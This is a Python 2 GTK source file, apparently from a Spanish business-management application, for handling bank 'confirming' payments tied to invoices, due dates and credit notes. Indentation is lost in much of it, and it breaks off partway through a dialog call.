pclases.Auditoria.nuevo(copia, self.usuario, __file__)
original.cantidad = copia.cantidad
for cobro in original.cobros:
nuevo_cobro = pclases.Cobro(confirming = copia,
facturaVenta = cobro.facturaVenta,
prefactura = cobro.prefactura,
facturaDeAbono = cobro.facturaDeAbono,
cliente = cobro.cliente,
fecha = cobro.fecha,
importe = cobro.importe / 2.0,
observaciones = 'Confirming con fecha ??/??/'
'???? y vencimiento ??/??/??'
'?? (pdte. de cobro)')
pclases.Auditoria.nuevo(nuevo_cobro, self.usuario, __file__)
cobro.importe = nuevo_cobro.importe
factura = cobro.facturaVenta or cobro.prefactura
if len(factura.vencimientosCobro) == 1:
vto_original = factura.vencimientosCobro[0]
vto_copia = pclases.VencimientoCobro(
facturaVenta = vto_original.facturaVenta,
prefactura = vto_original.prefactura,
fecha = vto_original.fecha,
importe = vto_original.importe / 2.0,
observaciones='Duplicado automáticamente '
'por división de confirming.')
pclases.Auditoria.nuevo(vto_copia, self.usuario, __file__)
vto_original.importe = vto_copia.importe
elif len(factura.vencimientosCobro) > 1:
# Hay que determinar el vencimiento a duplicar.
pass
self.actualizar_ventana()
nueva_ventana = Confirmings(copia) # @UnusedVariable
def recalcular(self, boton):
"""
Recalcula el total del confirming y coloca la suma de
los cobros que contiene en el campo correspondiente.
No guarda la cantidad. Eso lo debe hacer el usuario si
está conforme.
"""
confirming = self.objeto
total = 0
if confirming != None:
for c in confirming.cobros:
total += c.importe
self.wids['e_cantidad'].set_text(utils.float2str(total))
def es_diferente(self):
"""
Devuelve True si la información en pantalla es distinta a la
del objeto en memoria.
"""
confirming = self.objeto
if confirming == None:
return False # Si no hay confirming activo, devuelvo que no
# hay cambio respecto a la ventana
condicion = self.wids['e_fechar'].get_text() \
== confirming.fechaRecepcion.strftime('%d/%m/%Y')
buff = self.wids['txt_observaciones'].get_buffer()
condicion = condicion and (buff.get_text(buff.get_start_iter(),
buff.get_end_iter()) == confirming.observaciones)
condicion = condicion and (
(self.wids['e_fechac'].get_text()
== confirming.fechaCobro.strftime('%d/%m/%Y'))
or self.wids['e_fechac'].get_text() == ""
and not confirming.fechaCobro)
condicion = condicion and (
(self.wids['e_fechar'].get_text()
== confirming.fechaRecepcion.strftime('%d/%m/%Y'))
or self.wids['e_fechar'].get_text() == ""
and not confirming.fechaRecepcion)
condicion = condicion and (
self.wids['e_cantidad'].get_text()
== "%s" % (utils.float2str(confirming.cantidad)))
condicion = condicion and (
self.wids['e_codigo'].get_text() == confirming.codigo)
condicion = condicion and (
utils.combo_get_value(self.wids['cbe_banco'])==confirming.bancoID)
return not condicion # Concición verifica que sea igual
    def aviso_actualizacion(self):
        """
        Show a modal dialog warning that the confirming was modified
        remotely and the on-screen data must be refreshed, then enable
        the "Actualizar" (refresh) button.
        """
        utils.dialogo_info('ACTUALIZAR',
                           'El confirming ha sido modificado remotamente.\nD'
                           'ebe actualizar la información mostrada en pantal'
                           'la.\nPulse el botón «Actualizar»',
                           padre = self.wids['ventana'])
        self.wids['b_actualizar'].set_sensitive(True)
def inicializar_ventana(self):
"""
Inicializa los controles de la ventana, estableciendo sus
valores por defecto, deshabilitando los innecesarios,
rellenando los combos, formateando el TreeView -si lo hay-...
"""
# Inicialmente no se muestra NADA. Sólo se le deja al
# usuario la opción de buscar o crear nuevo.
self.activar_widgets(False)
self.wids['b_actualizar'].set_sensitive(False)
self.wids['b_guardar'].set_sensitive(False)
self.wids['b_nuevo'].set_sensitive(True)
self.wids['b_buscar'].set_sensitive(True)
cols = (('Factura', 'gobject.TYPE_STRING', False, True, True, None),
('Importe cobrado', 'gobject.TYPE_STRING', True, True, False,
self.cambiar_importe_cobro),
('Fecha vencimiento', 'gobject.TYPE_STRING',
False, True, False, None),
('Importe total de la factura', 'gobject.TYPE_STRING',
False, True, False, None),
('Vencimientos', 'gobject.TYPE_STRING',
False, True, False, None),
('ID', 'gobject.TYPE_INT64', False, False, False, None))
utils.preparar_listview(self.wids['tv_cobros'], cols)
self.colorear_cobros(self.wids['tv_cobros'])
self.wids['tv_cobros'].connect("row-activated", self.abrir_factura)
utils.rellenar_lista(self.wids['cbe_cliente'],
[(c.id, c.nombre) for c in
pclases.Cliente.select(
pclases.Cliente.q.inhabilitado == False,
orderBy="nombre")])
utils.combo_set_from_db(self.wids['cbe_cliente'], -1) # Esto
# quitará el elemento activo del combo.
self.wids['cbe_cliente'].child.set_text("")
def iter_cliente_seleccionado(completion, model, itr = None):
if itr == None: # Si me ha llamado el changed, el itr
# habrá cambiado JUSTO AHORA.
try:
itr = completion.get_active_iter()
except AttributeError:
itr = None
if itr != None:
idcliente = model[itr][0]
utils.combo_set_from_db(self.wids['cbe_cliente'], idcliente,
forced_value = pclases.Cliente.get(idcliente).nombre)
for p in [p for p in self.objeto.cobros if p.cliente == None]:
p.clienteID = idcliente
self.wids['cbe_cliente'].set_sensitive(
len([c for c in self.objeto.cobros if c.cliente != None]) == 0)
self.wids['cbe_cliente'].child.get_completion().connect(
'match-selected', iter_cliente_seleccionado)
self.wids['cbe_cliente'].connect('changed',
iter_cliente_seleccionado,
self.wids['cbe_cliente'].get_model(),
self.wids['cbe_cliente'].get_active_iter())
utils.rellenar_lista(self.wids['cbe_banco'],
[(b.id, b.nombre) for b in
pclases.Banco.select(orderBy = "nombre")])
def colorear_cobros(self, tv):
"""
Colorea los cobros marcando en otro color aquellos
en los que la cantidad cubierta por el confirming (el cobro)
difiera de la cantidad de la factura original.
"""
def cell_func(col, cell, model, itr, numcol):
valor = model[itr][numcol]
if model[itr][1] != model[itr][3]:
cell.set_property("foreground", "red")
else:
cell.set_property("foreground", "black")
cell.set_property("text", valor)
cols = tv.get_columns()
for i in xrange(len(cols)):
column = cols[i]
if i == 1:
cells = column.get_cell_renderers()
for cell in cells:
column.set_cell_data_func(cell, cell_func, i)
def abrir_factura(self, tv, path, view_column):
model = tv.get_model()
idcobro = model[path][-1]
cobro = pclases.Cobro.get(idcobro)
fra = cobro.facturaVenta
if fra != None:
from formularios import facturas_venta
ventanafacturas = facturas_venta.FacturasVenta(fra) # @UnusedVariable
prefra = cobro.prefactura
if prefra != None:
from formularios import prefacturas
ventanafacturas = prefacturas.Prefacturas(prefra) # @UnusedVariable
def cambiar_importe_cobro(self, cell, path, texto):
"""
Cambia el importe del cobro.
"""
model = self.wids['tv_cobros'].get_model()
try:
importe = utils.parse_euro(texto)
except ValueError:
utils.dialogo_info('ERROR EN FORMATO',
'El importe introducido no es correcto.',
padre = self.wids['ventana'])
return
idcobro = model[path][-1]
cobro = pclases.Cobro.get(idcobro)
cobro.importe = importe
cobro.syncUpdate()
model[path][1] = cobro.importe
def activar_widgets(self, s):
"""
Activa o desactiva (sensitive=True/False) todos
los widgets de la ventana que dependan del
objeto mostrado.
Entrada: s debe ser True o False. En todo caso
se evaluará como boolean.
"""
ws = ('hbuttonbox2', 'frame1', 'vbox2')
for w in ws:
self.wids[w].set_sensitive(s)
def ir_a_primero(self):
"""
Hace que el primer registro -si lo hay- de la tabla implicada
en el objeto del formulario sea el objeto activo.
"""
confirming = self.objeto
try:
# Anulo el aviso de actualización del envío que deja de ser activo.
if confirming != None:
confirming.notificador.set_func(lambda : None)
confirming = pclases.Confirming.select(orderBy = "-id")[0]
# Selecciono todos y me quedo con el primero de la lista
confirming.notificador.set_func(self.aviso_actualizacion)
# Activo la notificación
except:
confirming = None
self.objeto = confirming
self.actualizar_ventana()
def refinar_resultados_busqueda(self, resultados):
"""
Muestra en una ventana de resultados todos los
registros de "resultados".
Devuelve el id (primera columna de la ventana
de resultados) de la fila seleccionada o None
si se canceló.
"""
filas_res = []
for r in resultados:
cliente = r.cliente
filas_res.append((r.id,
r.codigo,
cliente != None and cliente.nombre or "",
utils.str_fecha(r.fechaRecepcion),
"%s €" % (utils.float2str(r.cantidad)),
utils.str_fecha(r.fechaCobro),
r.pendiente and "Sí" or "No",
", ".join([c.numfactura for c in r.cobros]),
r.banco and r.banco.nombre or ""))
idconfirming = utils.dialogo_resultado(filas_res,
titulo = 'Seleccione Confirming',
cabeceras = ('ID',
'Número',
'Cliente',
'Fecha recepción',
'Importe',
'Vencimiento',
'Pendiente',
'Facturas',
'Banco'),
padre = self.wids['ventana'])
if idconfirming < 0:
return None
else:
return idconfirming
def escribir_valor(self, widget, valor):
"""
Con respecto al widget: intenta escribir el valor como si
fuera un Entry. Si no lo consigue lo intenta como si fuera
un TextView.
En cuanto al valor, lo convierte en cadena antes de escribirlo.
"""
try:
widget.set_text(str(valor))
except AttributeError: #No tiene el set_text, por tanto no es un Entry.
widget.get_buffer().set_text(valor)
def leer_valor(self, widget):
"""
Intenta leer el valor como si fuera un Entry. Si no lo
consigue lo hace suponiendo que es un TextView.
Devuelve el valor leído _como cadena_.
"""
try:
res = widget.get_text()
except AttributeError:
buff = widget.get_buffer()
res = buff.get_text(buff.get_bounds()[0],
buff.get_bounds()[1])
return res
def rellenar_widgets(self):
"""
Introduce la información del confirming actual
en los widgets.
No se chequea que sea != None, así que
hay que tener cuidado de no llamar a
esta función en ese caso.
"""
confirming = self.objeto
self.wids['e_codigo'].set_text(confirming.codigo)
self.wids['e_fechar'].set_text(
confirming.fechaRecepcion.strftime('%d/%m/%Y'))
self.escribir_valor(self.wids['txt_observaciones'],
confirming.observaciones)
if not confirming.fechaCobro:
self.wids['e_fechac'].set_text('')
else:
self.wids['e_fechac'].set_text(
confirming.fechaCobro.strftime('%d/%m/%Y'))
self.wids['e_cantidad'].set_text(
'%s' % (utils.float2str(confirming.cantidad)))
importe_facturas_cubiertas=sum([c.importe for c in confirming.cobros])
if importe_facturas_cubiertas != confirming.cantidad:
self.wids['e_cantidad'].modify_text(gtk.STATE_NORMAL,
self.wids['e_cantidad'].get_colormap().alloc_color("red"))
else:
self.wids['e_cantidad'].modify_text(gtk.STATE_NORMAL,
self.wids['e_cantidad'].get_colormap().alloc_color("black"))
self.wids['tb_pendiente'].set_active(not confirming.pendiente)
self.show_texto_boton_pendiente()
self.rellenar_cobros()
self.wids['cbe_cliente'].set_sensitive(len(confirming.cobros) == 0)
utils.combo_set_from_db(self.wids['cbe_banco'], confirming.bancoID)
self.wids['l_estado'].set_text("<i>%s</i>"%confirming.get_str_estado())
self.wids['l_estado'].set_use_markup(True)
self.objeto.make_swap()
def show_texto_boton_pendiente(self):
"""
Muestra el texto del botón de pendiente acorde al estado del
confirming.
"""
confirming = self.objeto
if not confirming:
txtbutton = "No vencido"
else:
if self.wids['tb_pendiente'].get_active():
if confirming.fechaCobrado:
if confirming.fechaCobrado < confirming.fechaVencimiento:
txtbutton = "Confirming adelantado"
else:
txtbutton = 'Confirming cobrado'
else:
txtbutton = 'Confirming pendiente o no vencido'
else:
txtbutton = 'Confirming pendiente o no vencido'
self.wids['tb_pendiente'].set_label(txtbutton)
def rellenar_cobros(self):
model = self.wids['tv_cobros'].get_model()
model.clear()
if self.objeto.cobros != []:
utils.combo_set_from_db(self.wids['cbe_cliente'],
self.objeto.cobros[0].cliente.id,
forced_value = self.objeto.cobros[0].cliente.nombre)
for c in self.objeto.cobros:
if c.facturaVentaID != None:
importe_factura = c.facturaVenta.importeTotal
vencimientos = "(%d) "%(len(c.facturaVenta.vencimientosCobro))
vencimientos += "; ".join(
["%s: %s €" % (utils.str_fecha(v.fecha),
utils.float2str(v.importe))
for v in c.facturaVenta.vencimientosCobro])
elif c.prefacturaID != None:
importe_factura = c.prefactura.importeTotal
vencimientos = "(%d) " % (len(c.prefactura.vencimientosCobro))
vencimientos += "; ".join(["%s: %s €" % (
utils.str_fecha(v.fecha),
utils.float2str(v.importe))
for v in c.prefactura.vencimientosCobro])
elif c.facturaDeAbonoID != None:
importe_factura = c.facturaDeAbono.importeTotal
vencimientos = ""
model.append((c.numfactura,
"%s €" % (utils.float2str(c.importe)),
utils.str_fecha(c.fecha),
"%s €" % (utils.float2str(importe_factura)),
vencimientos,
c.id))
# --------------- Manejadores de eventos ----------------------------
def crear_nuevo(self, widget):
"""
Función callback del botón b_nuevo.
Pide los datos básicos para crear un nuevo objeto.
Una vez insertado en la BD hay que hacerlo activo
en la ventana para que puedan ser editados el resto
de campos que no se hayan pedido aquí.
"""
confirming = self.objeto
if confirming != None:
confirming.notificador.set_func(lambda : None)
self.objeto = pclases.Confirming(fechaCobro = mx.DateTime.localtime()
+ (mx.DateTime.oneDay * 60),
cantidad = 0,
cobrado = -1,
fechaRecepcion = mx.DateTime.localtime(),
fechaCobrado = None,
procesado = False,
banco = None)
confirming = self.objeto
pclases.Auditoria.nuevo(confirming, self.usuario, __file__)
confirming.notificador.set_func(self.aviso_actualizacion)
utils.dialogo_info(titulo = 'CONFIRMING CREADO',
texto = 'No olvide relacionar las facturas que '
'cubre el efecto.',
padre = self.wids['ventana'])
utils.combo_set_from_db(self.wids['cbe_cliente'], -1) # Esto quitará
# el elemento activo del combo.
self.wids['cbe_cliente'].child.set_text("")
self.actualizar_ventana()
def buscar(self, widget):
"""
Muestra una ventana de búsqueda y a continuación los
resultados. El objeto seleccionado se hará activo
en la ventana a no ser que se pulse en Cancelar en
la ventana de resultados.
"""
confirming = self.objeto
a_buscar = utils.dialogo_entrada(titulo = "BUSCAR CONFIRMING",
texto = "Introduzca número, fecha del confirming o "
"número de factura:",
padre = self.wids['ventana'])
if a_buscar != None:
if a_buscar.count('/') == 2:
fecha = utils.parse_fecha(a_buscar)
resultados = pclases.Confirming.select(pclases.OR(
pclases.Confirming.q.fechaRecepcion == fecha,
pclases.Confirming.q.fechaCobro == fecha))
lon = resultados.count()
else:
resultados = pclases.Confirming.select(
pclases.Confirming.q.codigo.contains(a_buscar))
resultados = list(resultados)
facturas = pclases.FacturaVenta.select(
pclases.FacturaVenta.q.numfactura.contains(a_buscar))
prefacturas = pclases.Prefactura.select(
pclases.Prefactura.q.numfactura.contains(a_buscar))
if facturas.count() + prefacturas.count() > 0:
for f in facturas:
for c in f.cobros:
if (c.confirming != None and c.confirming
not in resultados):
resultados.append(c.confirming)
for f in prefacturas:
for c in f.cobros:
if (c.confirming != None and c.confirming
not in resultados):
resultados.append(c.confirming)
lon = len(resultados)
if lon > 1:
## Refinar los resultados
idconfirming = self.refinar_resultados_busqueda(resultados)
if idconfirming == None:
return
resultados = [pclases.Confirming.get(idconfirming)]
elif lon < 1:
## Sin resultados de búsqueda
utils.dialogo_info('SIN RESULTADOS',
'La búsqueda no produjo resultados.\nPruebe a cambiar el'
' texto buscado o déjelo en blanco para ver una lista co'
'mpleta.\n(Atención: Ver la lista completa puede resulta'
'r lento si el número de elementos es muy alto)',
padre = self.wids['ventana'])
return
## Un único resultado
# Primero anulo la función de actualización
if confirming != None:
confirming.notificador.set_func(lambda : None)
# Pongo el objeto como actual
confirming = resultados[0]
# Y activo la función de notificación:
confirming.notificador.set_func(self.aviso_actualizacion)
self.objeto = confirming
self.actualizar_ventana()
def guardar(self, widget = None):
"""
Guarda el contenido de los entry y demás widgets de entrada
de datos en el objeto y lo sincroniza con la BD.
"""
confirming = self.objeto
codigo = self.wids['e_codigo'].get_text()
try:
fechar = utils.parse_fecha(self.wids['e_fechar'].get_text())
except:
utils.dialogo_info(titulo = "ERROR EN FORMATO DE FECHA",
texto = "El texto %s no es correcto o no repr"
"esenta una fecha" % (
self.wids['e_fechar'].get_text()),
padre = self.wids['ventana'])
fechar = self.objeto.fechaRecepcion
try:
fechac = utils.parse_fecha(self.wids['e_fechac'].get_text())
except:
utils.dialogo_info(titulo = "ERROR EN FORMATO DE FECHA",
texto = "El texto %s no es correcto o no representa una "
"fecha" % self.wids['e_fechar'].get_text(),
padre = self.wids['ventana'])
fechac = self.objeto.fechaCobro
buff = self.wids['txt_observaciones'].get_buffer()
observaciones = buff.get_text(buff.get_start_iter(),
buff.get_end_iter())
try:
cantidad=float(self.wids['e_cantidad'].get_text().replace("€", ""))
except:
utils.dialogo_info(titulo = "ERROR EN FORMATO NUMÉRICO",
texto = "El texto %s no es correcto o no representa un "
"número" % self.wids['e_cantidad'].get_text(),
padre = self.wids['ventana'])
cantidad = self.objeto.cantidad
self.objeto.fechaRecepcion = fechar
self.objeto.fechaCobro = fechac
self.objeto.observaciones = observaciones
self.objeto.cantidad = cantidad
self.objeto.codigo = codigo
self.objeto.bancoID = utils.combo_get_value(self.wids['cbe_banco'])
# Fuerzo la actualización de la BD y no espero a que SQLObject lo
# haga por mí:
confirming.syncUpdate()
# Vuelvo a activar el notificador
confirming.notificador.set_func(self.aviso_actualizacion)
self.actualizar_ventana()
self.wids['b_guardar'].set_sensitive(False)
def pendiente(self, w):
self.objeto.procesado = True # Modifica manualmente, no procesar.
if w.get_active():
self.objeto.cobrado = self.objeto.cantidad
# w.set_label('Confirming cobrado')
self.objeto.fechaCobrado = mx.DateTime.today()
self.objeto.syncUpdate()
for c in self.objeto.cobros:
c.fecha = self.objeto.fechaCobrado
c.syncUpdate()
else:
self.objeto.cobrado = -1
# w.set_label('Confirming pendiente')
self.objeto.fechaCobrado = None
self.objeto.syncUpdate()
for c in self.objeto.cobros:
c.fecha = self.objeto.fechaVencimiento
c.syncUpdate()
self.show_texto_boton_pendiente()
self.guardar()
self.objeto.sync()
self.objeto.make_swap()
w.set_active(w.get_active())
self.actualizar_ventana()
def refinar_resultados_busqueda_cliente(self, resultados):
"""
Muestra en una ventana de resultados todos los
registros de "resultados".
Devuelve el id (primera columna de la ventana
de resultados) de la fila seleccionada o None
si se canceló.
"""
filas_res = []
for r in resultados:
filas_res.append((r.id, r.nombre, r.cif))
idcliente = utils.dialogo_resultado(filas_res,
titulo = 'Seleccione Cliente',
cabeceras = ('ID Interno', 'Nombre', 'CIF'),
padre = self.wids['ventana'])
if idcliente < 0:
return None
else:
return idcliente
def buscar_cliente(self, include_inhabilitados = False):
"""
Muestra una ventana de búsqueda y a continuación los
resultados. El objeto seleccionado se hará activo
en la ventana a no ser que se pulse en Cancelar en
la ventana de resultados.
"""
cliente = None
a_buscar = utils.dialogo_entrada(titulo = "CIF",
texto = "Introduzca nombre o CIF del cliente:",
padre = self.wids['ventana'])
if a_buscar != None:
criterio = pclases.OR(pclases.Cliente.q.nombre.contains(a_buscar),
pclases.Cliente.q.cif.contains(a_buscar))
if not include_inhabilitados:
resultados = pclases.Cliente.select(pclases.AND(
pclases.Cliente.q.inhabilitado == False,
criterio))
else:
resultados = pclases.Cliente.select(criterio)
if resultados.count() > 1:
## Refinar los resultados
idcliente=self.refinar_resultados_busqueda_cliente(resultados)
if idcliente == None:
return
resultados = [pclases.Cliente.get(idcliente)]
elif resultados.count() < 1:
## Sin resultados de búsqueda
utils.dialogo_info('SIN RESULTADOS',
'La búsqueda no produjo resultados.\nPruebe a cambiar el'
' texto buscado o déjelo en blanco para ver una lista co'
'mpleta.\n(Atención: Ver la lista completa puede resulta'
'r lento si el número de elementos es muy alto)',
padre = self.wids['ventana'])
return
## Un único resultado
cliente = resultados[0]
return cliente
def refinar_resultados_busqueda_factura(self, resultados):
"""
Muestra en una ventana de resultados todos los
registros de "resultados".
Devuelve el id (primera columna de la ventana
de resultados) de la fila seleccionada o None
si se canceló.
"""
filas_res = []
for r in resultados:
nombrecliente = [r.cliente and r.cliente.nombre or ''][0]
filas_res.append((r.id, r.numfactura, utils.str_fecha(r.fecha),
nombrecliente))
idsfactura = utils.dialogo_resultado(filas_res,
titulo = 'Seleccione factura',
cabeceras = ('ID', 'Número de factura', 'Fecha', 'Cliente'),
padre = self.wids['ventana'],
multi = True)
if idsfactura < 0 or idsfactura == [-1]:
return None
else:
return idsfactura
def buscar_factura(self, cliente):
fras = None
numfra = utils.dialogo_entrada(titulo = "NÚMERO DE FACTURA",
texto = "Introduzca el número de factura",
padre = self.wids['ventana'])
if numfra != None:
fras = [("FV:%d" % f.id, f.numfactura, utils.str_fecha(f.fecha),
"%s €" % (utils.float2str(f.importeTotal)))
for f in cliente.facturasVenta
if numfra.upper() in f.numfactura.upper()]
fras += [("PF:%d" % f.id, f.numfactura, utils.str_fecha(f.fecha),
"%s €" % (utils.float2str(f.importeTotal)))
for f in cliente.prefacturas
if numfra.upper() in f.numfactura.upper()]
if len(fras) > 1:
idsfra = utils.dialogo_resultado(fras,
titulo = "SELECCIONE FACTURA",
cabeceras = ('ID', 'Número de factura',
'Fecha', 'Importe total'),
padre = self.wids['ventana'],
multi = True)
elif len(fras) == 1:
idsfra = [fras[0][0]]
else:
utils.dialogo_info(titulo = "FACTURA NO ENCONTRADA",
texto = "No se encontró ninguna factura.",
padre = self.wids['ventana'])
idsfra = []
fras = []
if len(idsfra) > 0 and idsfra[0] != -1:
for tipo, ide in [f.split(":") for f in idsfra]:
idfra = int(ide)
if tipo == "FV":
fras.append(pclases.FacturaVenta.get(idfra))
elif tipo == "PF":
fras.append(pclases.Prefactura.get(idfra))
return fras
    def preparar_vencimientos(self, factura):
        """
        From the due dates ("vencimientos"), estimations and payments
        linked to the invoice, builds a list of lists of the form:
        [[vencimiento, vencimiento_estimado, pago],
         [vencimiento, vencimiento_estimado, pago],
         ...]
        Any of the three objects may be None in a row where there is,
        for instance, no estimation or no payment for a due date.
        The list is built by pairing the three groups (due date,
        estimated due date and payment) by date proximity; no other
        criterion is taken into account.
        """
        res = []
        vtos = [v for v in factura.vencimientosCobro]
        ests = [v for v in factura.estimacionesCobro]
        pags = factura.cobros
        # The longest of the three lists fixes the number of result rows.
        mas_larga = [l for l in (vtos, ests, pags)
                     if len(l)==max(len(vtos), len(ests), len(pags))][0]
        if len(mas_larga) == 0: return []
        for i in xrange(len(mas_larga)):    # @UnusedVariable
            res.append([None, None, None])
        def comp(v1, v2):
            # cmp-style comparator by date (Python 2 list.sort signature).
            if v1.fecha < v2.fecha: return -1
            if v1.fecha > v2.fecha: return 1
            return 0
        def distancia(v1, v2):
            # Absolute distance between the dates of two items.
            return abs(v1.fecha - v2.fecha)
        def lugar(v):
            # Column index of the result row for each kind of object.
            if isinstance(v, pclases.VencimientoCobro):
                return 0
            elif isinstance(v, pclases.EstimacionCobro):
                return 1
            else:
                return 2
        resto = [vtos, ests, pags]
        resto.remove(mas_larga)
        mas_larga.sort(comp)
        pos = 0
        # Place the items of the longest list, one per row, in date order.
        for item in mas_larga:
            res [pos][lugar(item)] = item
            pos += 1
        # Pair each remaining item with the closest (by date) item of the
        # longest list that has not been matched yet.
        for lista in resto:
            mlc = mas_larga[:]
            lista.sort(comp)
            while lista:
                item2 = lista.pop()
                mindist = distancia(item2, mlc[0])
                sol = mlc[0]
                for item1 in mlc:
                    if distancia(item1, item2) < mindist:
                        sol = item1
                        mindist = distancia(item1, item2)
                res[mas_larga.index(sol)][lugar(item2)] = item2
                mlc.remove(sol)
        return res
    def buscar_vencimiento(self, factura):
        """
        Lets the user pick one of the invoice's due dates and returns
        the corresponding VencimientoCobro object, or None when the
        invoice has no due dates or the selection is cancelled.
        """
        vtos_full = self.preparar_vencimientos(factura)
        if len(vtos_full) == 0:
            utils.dialogo_info(titulo = "FACTURA SIN VENCIMIENTOS",
                texto = "La factura %s no tiene vencimientos.\nPara evitar in"
                        "coherencias, todo cobro o confirming debe correspond"
                        "erse con un vencimiento.\nCree los vencimientos ante"
                        "s de relacionar la factura con un confirming." % (
                            factura.numfactura),
                padre = self.wids['ventana'])
            return None
        # Rows: id, date, amount, notes and — when the paired payment
        # belongs to a confirming — that confirming's code.
        vtos = [(v[0].id,
                 utils.str_fecha(v[0].fecha),
                 "%s €" % (utils.float2str(v[0].importe)),
                 v[0].observaciones,
                 v[2] != None
                    and v[2].confirmingID != None
                    and v[2].confirming.codigo
                    or "")
                for v in vtos_full if v[0] != None] #\
                #    if v[2] == None] # The due date has no "associated" payment.
        if len(vtos) > 1:
            idvto = utils.dialogo_resultado(vtos,
                titulo = "SELECCIONE VENCIMIENTO",
                cabeceras = ('ID', 'Fecha', 'Importe',
                             'Observaciones',
                             'Cubierto en confirming'),
                padre = self.wids['ventana'])
        elif len(vtos) == 1:
            idvto = vtos[0][0]
        else:
            utils.dialogo_info(titulo = "FACTURA SIN VENCIMIENTOS",
                texto = "La factura no tiene vencimientos o ya han sido "
                        "cubiertos en otro confirming.",
                padre = self.wids['ventana'])
            idvto = -1
        # idvto <= 0 means "cancelled" or "nothing selectable".
        if idvto > 0:
            vto = pclases.VencimientoCobro.get(idvto)
        else:
            vto = None
        return vto
    def add_cobro(self, b):
        """
        Adds payments ("cobros") to the current confirming for the
        invoices chosen by the user, one payment per selected due date.
        `b` is the GTK button that triggered the callback.
        """
        confirming = self.objeto
        idcliente = utils.combo_get_value(self.wids['cbe_cliente'])
        if idcliente > 0:
            cliente = pclases.Cliente.get(idcliente)
        else:
            cliente = self.buscar_cliente()
        if cliente == None:
            return
        facturas = self.buscar_factura(cliente)
        if facturas == None:
            return
        for factura in facturas:
            # Skip invoices already included in this confirming, unless they
            # have several due dates (more payments may still be needed).
            if (factura.id in [c.facturaVentaID or c.prefacturaID
                               for c in self.objeto.cobros]
                    and len(factura.vencimientosCobro) < 2):
                utils.dialogo_info(titulo = "FACTURA YA INCLUIDA",
                    texto = "La factura %s ya ha sido incluida en este confi"
                            "rming." % (factura.numfactura),
                    padre = self.wids['ventana'])
                continue
            # TODO: Nothing prevents paying the same due date of the same
            # invoice in two different confirmings.
            vencimiento = self.buscar_vencimiento(factura)
            if vencimiento == None:
                continue
            antes = sum([c.importe for c in confirming.cobros])
            if antes == confirming.cantidad:
                actualizar_cantidad = True # As the amount equals the sum of
                    # the payments, the payment added now must update the
                    # total amount.
                    # Otherwise (amount different from the sum of the
                    # payments) it was entered by hand and so it must be
                    # respected.
            else:
                actualizar_cantidad = False
            observaciones = "Confirming %s con fecha %s y vencimiento %s" % (
                self.objeto.codigo,
                utils.str_fecha(self.objeto.fechaRecepcion),
                utils.str_fecha(self.objeto.fechaCobro))
            # The payment's client comes from whichever invoice the due
            # date belongs to (sale invoice or pre-invoice).
            if vencimiento.facturaVenta:
                cliente = vencimiento.facturaVenta.cliente
            elif vencimiento.prefactura:
                cliente = vencimiento.prefactura.cliente
            else:
                cliente = None
            cobro = pclases.Cobro(facturaVenta = vencimiento.facturaVenta,
                                  prefactura = vencimiento.prefactura,
                                  confirming = self.objeto,
                                  fecha = vencimiento.fecha,
                                  importe = vencimiento.importe,
                                  observaciones = observaciones,
                                  facturaDeAbono = None,
                                  cliente = cliente)
            pclases.Auditoria.nuevo(cobro, self.usuario, __file__)
            if actualizar_cantidad:
                # Keep "cobrado" in sync only when it already matched the
                # total amount before the insertion.
                if confirming.cobrado == confirming.cantidad:
                    confirming.cobrado = sum([c.importe
                                              for c in confirming.cobros])
                    confirming.cantidad = confirming.cobrado
                else:
                    confirming.cantidad = sum([c.importe
                                               for c in confirming.cobros])
        self.actualizar_ventana()
    def add_abono(self, boton):
        """
        Adds a "payment" for a credit-note invoice (a payment with a
        negative amount) to the current confirming.
        """
        confirming = self.objeto
        idcliente = utils.combo_get_value(self.wids['cbe_cliente'])
        if idcliente > 0:
            cliente = pclases.Cliente.get(idcliente)
        else:
            cliente = self.buscar_cliente()
        if cliente == None:
            return
        frabono = self.buscar_factura_de_abono(cliente)
        if frabono == None:
            return
        # Sum of payments *before* creating the new one; used below to
        # decide whether the confirming amount was maintained by hand.
        antes = sum([c.importe for c in confirming.cobros])
        observaciones = "Confirming %s con fecha %s y vencimiento %s" % (
            self.objeto.codigo,
            utils.str_fecha(self.objeto.fechaRecepcion),
            utils.str_fecha(self.objeto.fechaCobro))
        c = pclases.Cobro(facturaVenta = None,
                          confirming = self.objeto,
                          fecha = frabono.fecha,
                          importe = frabono.importeTotal,
                          observaciones = observaciones,
                          facturaDeAbono = frabono,
                          cliente = frabono and frabono.cliente or None)
        pclases.Auditoria.nuevo(c, self.usuario, __file__)
        if antes == confirming.cantidad:
            actualizar_cantidad = True # As the amount equals the sum of the
                # payments, the payment just added must update the total
                # amount.
                # Otherwise (amount different from the sum of the payments)
                # it was entered by hand and so it must be respected.
        else:
            actualizar_cantidad = False
        if actualizar_cantidad:
            # Keep "cobrado" in sync only when it already matched the total.
            if confirming.cobrado == confirming.cantidad:
                confirming.cobrado = sum([c.importe
                                          for c in confirming.cobros])
                confirming.cantidad = confirming.cobrado
            else:
                confirming.cantidad = sum([c.importe
                                           for c in confirming.cobros])
        self.actualizar_ventana()
    def buscar_factura_de_abono(self, cliente):
        """
        Searches, through dialogs, the credit-note invoices ("facturas
        de abono") of the received client and returns the selected one,
        or None when nothing is found or the search is cancelled.
        PRECONDITION: cliente must not be None.
        """
        frabono = None
        numabono = utils.dialogo_entrada(
            titulo = "NÚMERO DE FACTURA DE ABONO",
            texto = "Introduzca el número de la factura de abono "
                    "que busca:",
            padre = self.wids['ventana'])
        if numabono != None:
            abonos = pclases.Abono.select(
                pclases.Abono.q.numabono.contains(numabono))
            if abonos.count() == 0:
                utils.dialogo_info(titulo = "ABONO NO ENCONTRADO",
                    texto = "Factura con número de abono %s no encontrada." % (
                        numabono),
                    padre = self.wids['ventana'])
            elif abonos.count() == 1:
                # Exactly one match: use it directly, but it must already
                # have generated its credit-note invoice.
                abono = abonos[0]
                frabono = abono.facturaDeAbono
                if frabono == None:
                    utils.dialogo_info(titulo = "ABONO SIN FACTURAR",
                        texto = "El abono %s no ha generado factura de abono"
                                ".\n\n\n Si el abono está completo, genere "
                                "la factura desde la ventana de abonos y vue"
                                "lva a intentarlo." % (abono.numabono),
                        padre = self.wids['ventana'])
            else:
                # Several matches: let the user refine the selection.
                abono = self.refinar_busqueda_abonos(abonos)
                if abono != None:
                    frabono = abono.facturaDeAbono
                    if frabono == None:
                        utils.dialogo_info(titulo = "ABONO SIN FACTURAR",
                            texto = "El abono %s no ha generado factura de "
                                    "abono.\n\n\n Si el abono está complet"
                                    "o, genere la factura desde la ventana "
                                    "de abonos y vuelva a intentarlo." % (
